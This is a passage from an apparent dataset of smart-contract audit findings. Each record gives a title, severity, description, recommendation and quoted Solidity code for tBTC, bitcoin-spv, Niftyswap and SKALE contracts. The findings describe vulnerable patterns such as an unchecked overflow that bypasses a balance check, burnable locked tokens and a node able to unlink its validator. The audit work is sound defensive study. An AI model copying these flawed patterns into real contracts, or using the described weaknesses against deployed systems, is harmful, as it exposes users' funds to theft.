memberETHBalances[\\_member];\\n memberETHBalances[\\_member] = 0;\\n\\n /\\* solium-disable-next-line security/no-call-value \\*/\\n (bool success, ) = tokenStaking.magpieOf(\\_member).call.value(value)(\"\");\\n\\n require(success, \"Transfer failed\");\\n}\\n```\\nчRequire that the amount to be withdrawn is greater than zero.чч```\\nfunction withdraw(uint256 amount, address payable destination) public {\\n require(\\n unbondedValue[msg.sender] >= amount,\\n \"Insufficient unbonded value\"\\n );\\n\\n unbondedValue[msg.sender] -= amount;\\n\\n (bool success, ) = destination.call.value(amount)(\"\");\\n require(success, \"Transfer failed\");\\n}\\n```\\n -tbtc - Signer collusion may bypass increaseRedemptionFee flowчlowчDepositRedemption.increaseRedemptionFee is used by signers to approve a signable bitcoin transaction with a higher fee, in case the network is congested and miners are not approving the lower-fee transaction.\\nFee increases can be performed every 4 hours:\\n```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), \"Fee increase not yet permitted\");\\n```\\n\\nIn addition, each increase must increment the fee by exactly the initial proposed fee:\\n```\\n// Check that we're incrementing the fee by exactly the redeemer's initial fee\\nuint256 \\_previousOutputValue = DepositUtils.bytes8LEToUint(\\_previousOutputValueBytes);\\n\\_newOutputValue = DepositUtils.bytes8LEToUint(\\_newOutputValueBytes);\\nrequire(\\_previousOutputValue.sub(\\_newOutputValue) == \\_d.initialRedemptionFee, \"Not an allowed fee step\");\\n```\\n\\nOutside of these two restrictions, there is no limit to the number of times `increaseRedemptionFee` can be called. Over a 20-hour period, for example, `increaseRedemptionFee` could be called 5 times, increasing the fee to `initialRedemptionFee * 5`.\\nRather than calling `increaseRedemptionFee` 5 times over 20 hours, colluding signers may immediately create and sign a transaction with a fee of `initialRedemptionFee * 5`, wait for it to be mined, then submit it to `provideRedemptionProof`. Because `provideRedemptionProof` does not check that a transaction signature signs an approved digest, interested parties would need to monitor the bitcoin blockchain, notice the spend, and provide an ECDSA fraud proof before `provideRedemptionProof` is called.чResolution\\nIssue addressed in keep-network/tbtc#522\\nTrack the latest approved fee, and ensure the transaction in `provideRedemptionProof` does not include a higher fee.чч```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), \"Fee increase not yet permitted\");\\n```\\n -tbtc - liquidating a deposit does not send the complete remainder of the contract balance to recipientsчlowч`purchaseSignerBondsAtAuction` might leave a wei in the contract if:\\nthere is only one wei remaining in the contract\\nthere is more than one wei remaining but the contract balance is odd.\\ncontract balances must be > 1 wei otherwise no transfer is attempted\\nthe division at line 271 floors the result if dividing an odd balance. The contract is sending `floor(contract.balance / 2)` to the keep group and liquidationInitiator leaving one 1 in the contract.\\n```\\nif (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n}\\n```\\nчDefine a reasonable minimum amount when awarding the fraud reporter or liquidation initiator. Alternatively, always transfer the contract balance. When splitting the amount use the contract balance after the first transfer as the value being sent to the second recipient. Use the presence of locked funds in a contract as an error indicator unless funds were sent forcefully to the contract.чч```\\nif (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n}\\n```\\n -tbtc - approveAndCall unused return parameterчlowч`approveAndCall` always returns false because the return value `bool success` is never set.\\n```\\n/// @notice Set allowance for other address and notify.\\n/// Allows `\\_spender` to transfer the specified TDT\\n/// on your behalf and then ping the contract about it.\\n/// @dev The `\\_spender` should implement the `tokenRecipient` interface below\\n/// to receive approval notifications.\\n/// @param \\_spender Address of contract authorized to spend.\\n/// @param \\_tdtId The TDT they can spend.\\n/// @param \\_extraData Extra information to send to the approved contract.\\nfunction approveAndCall(address \\_spender, uint256 \\_tdtId, bytes memory \\_extraData) public returns (bool success) {\\n tokenRecipient spender = tokenRecipient(\\_spender);\\n approve(\\_spender, \\_tdtId);\\n spender.receiveApproval(msg.sender, \\_tdtId, address(this), \\_extraData);\\n}\\n```\\nчReturn the correct success state.чч```\\n/// @notice Set allowance for other address and notify.\\n/// Allows `\\_spender` to transfer the specified TDT\\n/// on your behalf and then ping the contract about it.\\n/// @dev The `\\_spender` should implement the `tokenRecipient` interface below\\n/// to receive approval notifications.\\n/// @param \\_spender Address of contract authorized to spend.\\n/// @param \\_tdtId The TDT they can spend.\\n/// @param \\_extraData Extra information to send to the approved contract.\\nfunction approveAndCall(address \\_spender, uint256 \\_tdtId, bytes memory \\_extraData) public returns (bool success) {\\n tokenRecipient spender = tokenRecipient(\\_spender);\\n approve(\\_spender, \\_tdtId);\\n spender.receiveApproval(msg.sender, \\_tdtId, address(this), \\_extraData);\\n}\\n```\\n -bitcoin-spv - Unnecessary memory allocation in BTCUtils Pendingчlowч`BTCUtils` makes liberal use of `BytesLib.slice`, which returns a freshly-allocated slice of an existing bytes array. In many cases, the desired behavior is simply to read a 32-byte slice of a byte array. As a result, the typical pattern used is: `bytesVar.slice(start, start + 32).toBytes32()`.\\nThis pattern introduces unnecessary complexity and memory allocation in a critically important library: cloning a portion of the array, storing that clone in memory, and then reading it from memory. A simpler alternative would be to implement `BytesLib.readBytes32(bytes _b, uint _idx)` and other “memory-read” functions.\\nRather than moving the free memory pointer and redundantly reading, storing, then re-reading memory, `readBytes32` and similar functions would perform a simple length check and `mload` directly from the desired index in the array.\\nextractInputTxIdLE:\\n```\\n/// @notice Extracts the outpoint tx id from an input\\n/// @dev 32 byte tx id\\n/// @param \\_input The input\\n/// @return The tx id (little-endian bytes)\\nfunction extractInputTxIdLE(bytes memory \\_input) internal pure returns (bytes32) {\\n return \\_input.slice(0, 32).toBytes32();\\n}\\n```\\n\\nverifyHash256Merkle:\\n```\\nuint \\_idx = \\_index;\\nbytes32 \\_root = \\_proof.slice(\\_proof.length - 32, 32).toBytes32();\\nbytes32 \\_current = \\_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\\_proof.length.div(32)) - 1; i++) {\\n if (\\_idx % 2 == 1) {\\n \\_current = \\_hash256MerkleStep(\\_proof.slice(i \\* 32, 32), abi.encodePacked(\\_current));\\n } else {\\n \\_current = \\_hash256MerkleStep(abi.encodePacked(\\_current), \\_proof.slice(i \\* 32, 32));\\n }\\n \\_idx = \\_idx 1;\\n}\\nreturn \\_current == \\_root;\\n```\\nчImplement `BytesLib.readBytes32` and favor its use over the `bytesVar.slice(start, start + 32).toBytes32()` pattern. Implement other memory-read functions where possible, and avoid the use of `slice`.\\nNote, too, that implementing this change in `verifyHash256Merkle` would allow `_hash256MerkleStep` to accept 2 `bytes32` inputs (rather than bytes), removing additional unnecessary casting and memory allocation.чч```\\n/// @notice Extracts the outpoint tx id from an input\\n/// @dev 32 byte tx id\\n/// @param \\_input The input\\n/// @return The tx id (little-endian bytes)\\nfunction extractInputTxIdLE(bytes memory \\_input) internal pure returns (bytes32) {\\n return \\_input.slice(0, 32).toBytes32();\\n}\\n```\\n -bitcoin-spv - ValidateSPV.validateHeaderChain does not completely validate input Won't Fixчlowч`ValidateSPV.validateHeaderChain` takes as input a sequence of Bitcoin headers and calculates the total accumulated difficulty across the entire sequence. The input headers are checked to ensure they are relatively well-formed:\\n```\\n// Check header chain length\\nif (\\_headers.length % 80 != 0) {return ERR\\_BAD\\_LENGTH;}\\n```\\n\\nHowever, the function lacks a check for nonzero length of `_headers`. Although the total difficulty returned would be zero, an explicit check would make this more clear.чIf `headers.length` is zero, return `ERR_BAD_LENGTH`чч```\\n// Check header chain length\\nif (\\_headers.length % 80 != 0) {return ERR\\_BAD\\_LENGTH;}\\n```\\n -bitcoin-spv - unnecessary intermediate castчlowч`CheckBitcoinSigs.accountFromPubkey()` casts the `bytes32` keccack256 hash of the `pubkey` to `uint256`, then `uint160` and then finally to `address` while the intermediate cast is not required.\\n```\\n/// @notice Derives an Ethereum Account address from a pubkey\\n/// @dev The address is the last 20 bytes of the keccak256 of the address\\n/// @param \\_pubkey The public key X & Y. Unprefixed, as a 64-byte array\\n/// @return The account address\\nfunction accountFromPubkey(bytes memory \\_pubkey) internal pure returns (address) {\\n require(\\_pubkey.length == 64, \"Pubkey must be 64-byte raw, uncompressed key.\");\\n\\n // keccak hash of uncompressed unprefixed pubkey\\n bytes32 \\_digest = keccak256(\\_pubkey);\\n return address(uint160(uint256(\\_digest)));\\n}\\n```\\nчThe intermediate cast from `uint256` to `uint160` can be omitted. Refactor to `return address(uint256(_digest))` instead.чч```\\n/// @notice Derives an Ethereum Account address from a pubkey\\n/// @dev The address is the last 20 bytes of the keccak256 of the address\\n/// @param \\_pubkey The public key X & Y. Unprefixed, as a 64-byte array\\n/// @return The account address\\nfunction accountFromPubkey(bytes memory \\_pubkey) internal pure returns (address) {\\n require(\\_pubkey.length == 64, \"Pubkey must be 64-byte raw, uncompressed key.\");\\n\\n // keccak hash of uncompressed unprefixed pubkey\\n bytes32 \\_digest = keccak256(\\_pubkey);\\n return address(uint160(uint256(\\_digest)));\\n}\\n```\\n -bitcoin-spv - unnecessary logic in BytesLib.toBytes32()чlowчThe heavily used library function `BytesLib.toBytes32()` unnecessarily casts `_source` to `bytes` (same type) and creates a copy of the dynamic byte array to check it's length, while this can be done directly on the user-provided `bytes` `_source`.\\n```\\nfunction toBytes32(bytes memory \\_source) pure internal returns (bytes32 result) {\\n bytes memory tempEmptyStringTest = bytes(\\_source);\\n if (tempEmptyStringTest.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n}\\n```\\nч```\\nfunction toBytes32(bytes memory \\_source) pure internal returns (bytes32 result) {\\n if (\\_source.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n }\\n```\\nчч```\\nfunction toBytes32(bytes memory \\_source) pure internal returns (bytes32 result) {\\n bytes memory tempEmptyStringTest = bytes(\\_source);\\n if (tempEmptyStringTest.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n}\\n```\\n -bitcoin-spv - redundant functionality Won't FixчlowчThe library exposes redundant implementations of bitcoins double `sha256`.\\nsolidity native implementation with an overzealous type correction issue 5.45\\n```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev abi.encodePacked changes the return to bytes instead of bytes32\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n\\nassembly implementation\\nNote this implementation does not handle errors when staticcall'ing the precompiled `sha256` contract (private chains).\\n```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev sha2 is precompiled smart contract located at address(2)\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256View(bytes memory \\_b) internal view returns (bytes32 res) {\\n assembly {\\n let ptr := mload(0x40)\\n pop(staticcall(gas, 2, add(\\_b, 32), mload(\\_b), ptr, 32))\\n pop(staticcall(gas, 2, ptr, 32, ptr, 32))\\n res := mload(ptr)\\n }\\n}\\n```\\nчWe recommend providing only one implementation for calculating the double `sha256` as maintaining two interfaces for the same functionality is not desirable. Furthermore, even though the assembly implementation is saving gas, we recommend keeping the language provided implementation.чч```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev abi.encodePacked changes the return to bytes instead of bytes32\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n -bitcoin-spv - unnecessary type correctionчlowчThe type correction `encodePacked().toBytes32()` is not needed as `sha256` already returns `bytes32`.\\n```\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\nчRefactor to `return sha256(abi.encodePacked(sha256(_b)));` to save gas.чч```\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n -tbtc - Where possible, a specific contract type should be used rather than addressчlowчRather than storing addresses and then casting to the known contract type, it's better to use the best type available so the compiler can check for type safety.\\n`TBTCSystem.priceFeed` is of type `address`, but it could be type `IBTCETHPriceFeed` instead. Not only would this give a little more type safety when deploying new modules, but it would avoid repeated casts throughout the codebase of the form `IBTCETHPriceFeed(priceFeed)`, `IRelay(relay)`, `TBTCSystem()`, and others.\\n```\\nstruct Deposit {\\n\\n // SET DURING CONSTRUCTION\\n address TBTCSystem;\\n address TBTCToken;\\n address TBTCDepositToken;\\n address FeeRebateToken;\\n address VendingMachine;\\n uint256 lotSizeSatoshis;\\n uint8 currentState;\\n uint256 signerFeeDivisor;\\n uint128 undercollateralizedThresholdPercent;\\n uint128 severelyUndercollateralizedThresholdPercent;\\n```\\n\\n```\\ncontract DepositFactory is CloneFactory, TBTCSystemAuthority{\\n\\n // Holds the address of the deposit contract\\n // which will be used as a master contract for cloning.\\n address public masterDepositAddress;\\n address public tbtcSystem;\\n address public tbtcToken;\\n address public tbtcDepositToken;\\n address public feeRebateToken;\\n address public vendingMachine;\\n uint256 public keepThreshold;\\n uint256 public keepSize;\\n```\\n\\nRemediation\\nWhere possible, use more specific types instead of `address`. This goes for parameter types as well as state variable types.чResolution\\nThis issue has been addressed with https://github.com/keep-network/tbtc/issues/507 and keep-network/tbtc#542.чч```\\nstruct Deposit {\\n\\n // SET DURING CONSTRUCTION\\n address TBTCSystem;\\n address TBTCToken;\\n address TBTCDepositToken;\\n address FeeRebateToken;\\n address VendingMachine;\\n uint256 lotSizeSatoshis;\\n uint8 currentState;\\n uint256 signerFeeDivisor;\\n uint128 undercollateralizedThresholdPercent;\\n uint128 severelyUndercollateralizedThresholdPercent;\\n```\\n -tbtc - Variable shadowing in DepositFactoryчlowч`DepositFactory` inherits from `TBTCSystemAuthority`. Both contracts declare a state variable with the same name, `tbtcSystem`.\\n```\\naddress public tbtcSystem;\\n```\\nчRemove the shadowed variable.чч```\\naddress public tbtcSystem;\\n```\\n -tbtc - Values may contain dirty lower-order bits Pendingчlowч`FundingScript` and `RedemptionScript` use `mload` to cast the first bytes of a byte array to `bytes4`. Because `mload` deals with 32-byte chunks, the resulting `bytes4` value may contain dirty lower-order bits.\\nFundingScript.receiveApproval:\\n```\\n// Verify \\_extraData is a call to unqualifiedDepositToTbtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.unqualifiedDepositToTbtc.selector,\\n \"Bad \\_extraData signature. Call must be to unqualifiedDepositToTbtc.\"\\n);\\n```\\n\\nRedemptionScript.receiveApproval:\\n```\\n// Verify \\_extraData is a call to tbtcToBtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.tbtcToBtc.selector,\\n \"Bad \\_extraData signature. Call must be to tbtcToBtc.\"\\n);\\n```\\nчSolidity truncates these unneeded bytes in the subsequent comparison operations, so there is no action required. However, this is good to keep in mind if these values are ever used for anything outside of strict comparison.чч```\\n// Verify \\_extraData is a call to unqualifiedDepositToTbtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.unqualifiedDepositToTbtc.selector,\\n \"Bad \\_extraData signature. Call must be to unqualifiedDepositToTbtc.\"\\n);\\n```\\n -tbtc - Revert error string may be malformed Pendingчlowч`FundingScript` handles an error from a call to `VendingMachine` like so.\\n```\\n// Call the VendingMachine.\\n// We could explictly encode the call to vending machine, but this would\\n// involve manually parsing \\_extraData and allocating variables.\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\n \\_extraData\\n);\\nrequire(success, string(returnData));\\n```\\n\\nOn a high-level revert, `returnData` will already include the typical “error selector”. As `FundingScript` propagates this error message, it will add another error selector, which may make it difficult to read the error message.\\nThe same issue is present in RedemptionScript:\\n```\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\_extraData);\\n// By default, `address.call` will catch any revert messages.\\n// Converting the `returnData` to a string will effectively forward any revert messages.\\n// https://ethereum.stackexchange.com/questions/69133/forward-revert-message-from-low-level-solidity-call\\n// TODO: there's some noisy couple bytes at the beginning of the converted string, maybe the ABI-coded length?\\nrequire(success, string(returnData));\\n```\\nчRather than adding an assembly-level revert to the affected contracts, ensure nested error selectors are handled in external libraries.чч```\\n// Call the VendingMachine.\\n// We could explictly encode the call to vending machine, but this would\\n// involve manually parsing \\_extraData and allocating variables.\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\n \\_extraData\\n);\\nrequire(success, string(returnData));\\n```\\n -tbtc - Where possible, use constant rather than state variablesчlowч`TBTCSystem` uses a state variable for `pausedDuration`, but this value is never changed.\\n```\\nuint256 pausedDuration = 10 days;\\n```\\nчConsider using the `constant` keyword.чч```\\nuint256 pausedDuration = 10 days;\\n```\\n -tbtc - Variable shadowing in TBTCDepositToken constructorчlowч`TBTCDepositToken` inherits from `DepositFactoryAuthority`, which has a single state variable, `_depositFactory`. This variable is shadowed in the `TBTCDepositToken` constructor.\\n```\\nconstructor(address \\_depositFactory)\\n ERC721Metadata(\"tBTC Deopsit Token\", \"TDT\")\\n DepositFactoryAuthority(\\_depositFactory)\\npublic {\\n // solium-disable-previous-line no-empty-blocks\\n}\\n```\\nчRename the parameter or state variable.чч```\\nconstructor(address \\_depositFactory)\\n ERC721Metadata(\"tBTC Deopsit Token\", \"TDT\")\\n DepositFactoryAuthority(\\_depositFactory)\\npublic {\\n // solium-disable-previous-line no-empty-blocks\\n}\\n```\\n -Incorrect response from price feed if called during an onERC1155Received callback AcknowledgedчmediumчThe ERC 1155 standard requires that smart contracts must implement `onERC1155Received` and `onERC1155BatchReceived` to accept transfers.\\nThis means that on any token received, code run on the receiving smart contract.\\nIn `NiftyswapExchange` when adding / removing liquidity or buying tokens, the methods mentioned above are called when the tokens are sent. When this happens, the state of the contract is changed but not completed, the tokens are sent to the receiving smart contract but the state is not completely updated.\\nThis happens in these cases\\n`_baseToToken` (when buying tokens)\\n```\\n// // Refund Base Token if any\\nif (totalRefundBaseTokens > 0) {\\n baseToken.safeTransferFrom(address(this), \\_recipient, baseTokenID, totalRefundBaseTokens, \"\");\\n}\\n\\n// Send Tokens all tokens purchased\\ntoken.safeBatchTransferFrom(address(this), \\_recipient, \\_tokenIds, \\_tokensBoughtAmounts, \"\");\\n```\\n\\n`_removeLiquidity`\\n```\\n// Transfer total Base Tokens and all Tokens ids\\nbaseToken.safeTransferFrom(address(this), \\_provider, baseTokenID, totalBaseTokens, \"\");\\ntoken.safeBatchTransferFrom(address(this), \\_provider, \\_tokenIds, tokenAmounts, \"\");\\n```\\n\\n`_addLiquidity`\\n```\\n// Mint liquidity pool tokens\\n\\_batchMint(\\_provider, \\_tokenIds, liquiditiesToMint, \"\");\\n\\n// Transfer all Base Tokens to this contract\\nbaseToken.safeTransferFrom(\\_provider, address(this), baseTokenID, totalBaseTokens, abi.encode(DEPOSIT\\_SIG));\\n```\\n\\nEach of these examples send some tokens to the smart contract, which triggers calling some code on the receiving smart contract.\\nWhile these methods have the `nonReentrant` modifier which protects them from re-netrancy, the result of the methods `getPrice_baseToToken` and `getPrice_tokenToBase` is affected. These 2 methods do not have the `nonReentrant` modifier.\\nThe price reported by the `getPrice_baseToToken` and `getPrice_tokenToBase` methods is incorrect (until after the end of the transaction) because they rely on the number of tokens owned by the NiftyswapExchange; which between the calls is not finalized. Hence the price reported will be incorrect.\\nThis gives the smart contract which receives the tokens, the opportunity to use other systems (if they exist) that rely on the result of `getPrice_baseToToken` and `getPrice_tokenToBase` to use the returned price to its advantage.\\nIt's important to note that this is a bug only if other systems rely on the price reported by this `NiftyswapExchange`. Also the current contract is not affected, nor its balances or internal ledger, only other systems relying on its reported price will be fooled.чResolution\\nThe design will not be modified. Horizon Games should clearly document this risk for 3rd parties seeking to use Niftyswap as a price feed.\\nBecause there is no way to enforce how other systems work, a restriction can be added on `NiftyswapExchange` to protect other systems (if any) that rely on `NiftyswapExchange` for price discovery.\\nAdding a `nonReentrant` modifier on the view methods `getPrice_baseToToken` and `getPrice_tokenToBase` will add a bit of protection for the ecosystem.чч```\\n// // Refund Base Token if any\\nif (totalRefundBaseTokens > 0) {\\n baseToken.safeTransferFrom(address(this), \\_recipient, baseTokenID, totalRefundBaseTokens, \"\");\\n}\\n\\n// Send Tokens all tokens purchased\\ntoken.safeBatchTransferFrom(address(this), \\_recipient, \\_tokenIds, \\_tokensBoughtAmounts, \"\");\\n```\\n -Ether send function remainder handlingчlowчThe Ether send function depicted below implements logic to reimburse the sender if an extraneous amount is left in the contract after the disbursement.\\n```\\nfunction sendEth(address payable [] memory \\_to, uint256[] memory \\_value) public restrictedToOwner payable returns (bool \\_success) {\\n // input validation\\n require(\\_to.length == \\_value.length);\\n require(\\_to.length <= 255);\\n\\n // count values for refunding sender\\n uint256 beforeValue = msg.value;\\n uint256 afterValue = 0;\\n\\n // loop through to addresses and send value\\n for (uint8 i = 0; i < \\_to.length; i++) {\\n afterValue = afterValue.add(\\_value[i]);\\n assert(\\_to[i].send(\\_value[i]));\\n }\\n\\n // send back remaining value to sender\\n uint256 remainingValue = beforeValue.sub(afterValue);\\n if (remainingValue > 0) {\\n assert(msg.sender.send(remainingValue));\\n }\\n return true;\\n}\\n```\\n\\nIt is also the only place where the `SafeMath` dependency is being used. More specifically to check there was no underflow in the arithmetic adding up the disbursed amounts.\\nHowever, since the individual sends would revert themselves should more Ether than what was available in the balance be specified these protection measures seem unnecessary.\\nNot only the above is true but the current codebase does not allow to take funds locked within the contract out in the off chance someone forced funds into this smart contract (e.g., by self-destructing some other smart contract containing funds into this one).чThe easiest way to handle both retiring `SafeMath` and returning locked funds would be to phase out all the intra-function arithmetic and just transferring `address(this).balance` to `msg.sender` at the end of the disbursement. Since all the funds in there are meant to be from the caller of the function this serves the purpose of returning extraneous funds to him well and, adding to that, it allows for some front-running fun if someone “self-destructed” funds to this smart contract by mistake.чч```\\nfunction sendEth(address payable [] memory \\_to, uint256[] memory \\_value) public restrictedToOwner payable returns (bool \\_success) {\\n // input validation\\n require(\\_to.length == \\_value.length);\\n require(\\_to.length <= 255);\\n\\n // count values for refunding sender\\n uint256 beforeValue = msg.value;\\n uint256 afterValue = 0;\\n\\n // loop through to addresses and send value\\n for (uint8 i = 0; i < \\_to.length; i++) {\\n afterValue = afterValue.add(\\_value[i]);\\n assert(\\_to[i].send(\\_value[i]));\\n }\\n\\n // send back remaining value to sender\\n uint256 remainingValue = beforeValue.sub(afterValue);\\n if (remainingValue > 0) {\\n assert(msg.sender.send(remainingValue));\\n }\\n return true;\\n}\\n```\\n -Unneeded type cast of contract typeчlowчThe typecast being done on the `address` parameter in the lien below is unneeded.\\n```\\nERC20 token = ERC20(\\_tokenAddress);\\n```\\nчAssign the right type at the function parameter definition like so:\\n```\\n function sendErc20(ERC20 _tokenAddress, address[] memory _to, uint256[] memory _value) public restrictedToOwner returns (bool _success) {\\n```\\nчч```\\nERC20 token = ERC20(\\_tokenAddress);\\n```\\n -Inadequate use of assertчlowчThe usage of `require` vs `assert` has always been a matter of discussion because of the fine lines distinguishing these transaction-terminating expressions.\\nHowever, the usage of the `assert` syntax in this case is not the most appropriate.\\nBorrowing the explanation from the latest solidity docs (v. https://solidity.readthedocs.io/en/latest/control-structures.html#id4) :\\n```\\nThe assert function should only be used to test for internal errors, and to check invariants. \\n```\\n\\nSince assert-style exceptions (using the `0xfe` opcode) consume all gas available to the call and require-style ones (using the `0xfd` opcode) do not since the Metropolis release when the `REVERT` instruction was added, the usage of `require` in the lines depicted in the examples section would only result in gas savings and the same security assumptions.\\nIn this case, even though the calls are being made to external contracts the supposedly abide to a predefined specification, this is by no means an invariant of the presented system since the component is external to the built system and its integrity cannot be formally verified.\\n```\\nassert(\\_to[i].send(\\_value[i]));\\n```\\n\\n```\\nassert(msg.sender.send(remainingValue));\\n```\\n\\n```\\nassert(token.transferFrom(msg.sender, \\_to[i], \\_value[i]) == true);\\n```\\nчExchange the `assert` statements for `require` ones.чч```\\nThe assert function should only be used to test for internal errors, and to check invariants. \\n```\\n -uint overflow may lead to stealing fundsчhighчIt's possible to create a delegation with a very huge amount which may result in a lot of critically bad malicious usages:\\n```\\nuint holderBalance = SkaleToken(contractManager.getContract(\"SkaleToken\")).balanceOf(holder);\\nuint lockedToDelegate = tokenState.getLockedCount(holder) - tokenState.getPurchasedAmount(holder);\\nrequire(holderBalance >= amount + lockedToDelegate, \"Delegator hasn't enough tokens to delegate\");\\n```\\n\\n`amount` is passed by a user as a parameter, so if it's close to `uint` max value, `amount` + lockedToDelegate would overflow and this requirement would pass.\\nHaving delegation with an almost infinite amount of tokens can lead to many various attacks on the system up to stealing funds and breaking everything.чUsing `SafeMath` everywhere should prevent this and other similar issues. There should be more critical attacks caused by overflows/underflows, so `SafeMath` should be used everywhere in the codebase.чч```\\nuint holderBalance = SkaleToken(contractManager.getContract(\"SkaleToken\")).balanceOf(holder);\\nuint lockedToDelegate = tokenState.getLockedCount(holder) - tokenState.getPurchasedAmount(holder);\\nrequire(holderBalance >= amount + lockedToDelegate, \"Delegator hasn't enough tokens to delegate\");\\n```\\n -Holders can burn locked fundsчhighчSkale token is a modified ERC-777 that allows locking some part of the balance. Locking is checked during every transfer:\\n```\\n// Property of the company SKALE Labs inc.---------------------------------\\n uint locked = \\_getLockedOf(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked + amount, \"Token should be unlocked for transferring\");\\n }\\n//-------------------------------------------------------------------------\\n \\_balances[from] = \\_balances[from].sub(amount);\\n \\_balances[to] = \\_balances[to].add(amount);\\n```\\n\\nBut it's not checked during `burn` function and it's possible to “burn” `locked` tokens. Tokens will be burned, but `locked` amount will remain the same. That will result in having more `locked` tokens than the balance which may have very unpredictable behaviour.чAllow burning only unlocked tokens.чч```\\n// Property of the company SKALE Labs inc.---------------------------------\\n uint locked = \\_getLockedOf(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked + amount, \"Token should be unlocked for transferring\");\\n }\\n//-------------------------------------------------------------------------\\n \\_balances[from] = \\_balances[from].sub(amount);\\n \\_balances[to] = \\_balances[to].add(amount);\\n```\\n -Node can unlink validatorчhighчValidators can link a node address to them by calling `linkNodeAddress` function:\\n```\\nfunction linkNodeAddress(address validatorAddress, address nodeAddress) external allow(\"DelegationService\") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == 0, \"Validator cannot override node address\");\\n \\_validatorAddressToId[nodeAddress] = validatorId;\\n}\\n\\nfunction unlinkNodeAddress(address validatorAddress, address nodeAddress) external allow(\"DelegationService\") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == validatorId, \"Validator hasn't permissions to unlink node\");\\n \\_validatorAddressToId[nodeAddress] = 0;\\n}\\n```\\n\\nAfter that, the node has the same rights and is almost indistinguishable from the validator. So the node can even remove validator's address from `_validatorAddressToId` list and take over full control over validator. Additionally, the node can even remove itself by calling `unlinkNodeAddress`, leaving validator with no control at all forever.\\nAlso, even without nodes, a validator can initially call `unlinkNodeAddress` to remove itself.чLinked nodes (and validator) should not be able to unlink validator's address from the `_validatorAddressToId` mapping.чч```\\nfunction linkNodeAddress(address validatorAddress, address nodeAddress) external allow(\"DelegationService\") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == 0, \"Validator cannot override node address\");\\n \\_validatorAddressToId[nodeAddress] = validatorId;\\n}\\n\\nfunction unlinkNodeAddress(address validatorAddress, address nodeAddress) external allow(\"DelegationService\") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == validatorId, \"Validator hasn't permissions to unlink node\");\\n \\_validatorAddressToId[nodeAddress] = 0;\\n}\\n```\\n -Unlocking funds after slashingчhighчThe initial funds can be unlocked if 51+% of them are delegated. However if any portion of the funds are slashed, the rest of the funds will not be unlocked at the end of the delegation period.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n```\\nчConsider slashed tokens as delegated, or include them in the calculation for process to unlock in `endingDelegatedToUnlocked`чч```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n```\\n -Bounties and fees should only be locked for the first 3 monthsчhighчBounties are currently locked for the first 3 months after delegation:\\n```\\nskaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n```\\n\\nInstead, they should be locked for the first 3 months after the token launch.чIt's better just to forbid any withdrawals for the first 3 months, no need to track it separately for every delegation. This recommendation is mainly to simplify the process.чч```\\nskaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n```\\n -getLockedCount is iterating over all history of delegationsчhighч`getLockedCount` is iterating over all delegations of a specific holder and may even change the state of these delegations by calling `getState`.\\n```\\nfunction getLockedCount(address holder) external returns (uint 